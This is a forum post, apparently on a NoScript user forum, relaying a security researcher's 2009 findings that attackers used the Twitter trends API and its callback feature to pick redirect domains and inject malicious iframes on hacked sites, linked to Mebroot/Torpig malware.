Attackers use Twitter API function to create iFrame attack

[luntrus]

Hi users of NS,

It appears that Twitter offers all sorts of possibilities for cybercriminals
for dubious activities, because next to the use of malicious Tweets also the
Twitter API is an attacker vector of choice.

Security researcher Denis Sinegubko discovered that the API used to generate 30 most popular themes,
is being used to hide malcode that links to exploitsites.
The script uses the second letter in the most popular Twitter search query of two days ago,
to check on what exploitsite to redirect a victim to.
This gives the hackers ample time to register a new domain that will be active the following day.
Then attackers will place the Twitter code onto hacked websites.

Well contemplaited scheme
According to Sinegubko this makes all of the script looks less suspicious to go under the radar.
http://blog.unmaskparasites.com/2009/11 ... s-scripts/
The script in question has been heavily obfuscated to circumvent easy detection,
this even more so because the function that will create all the havoc will be nowhere called explicitly.
For this the attackers use the 'callback' feature of the Twitter API.
Twitter then sends back JavaScript that will call the fuction given in by the hacker,
this will then cause a malicious iframe injection.
"This is more like than not the most creative script seen sofar.
Happily for us they did not ponder on it thoroughly", according to Sinegubko.
Of the registered domain names only one was actually registrated.

According to a reaction on Sinegubko's blog the researcher stumbled upon Mebroot malware, also known as
Sinowal or Torpig.
http://www.cs.ucsb.edu/~seclab/projects ... index.html
The algorithm the malicious software uses to generate the drive-by-download servers,
was recently updated using Twitter API,
But I assume we can feel secure having NS inside our browser,
no matter what devious scripts will be sent to us,

luntrus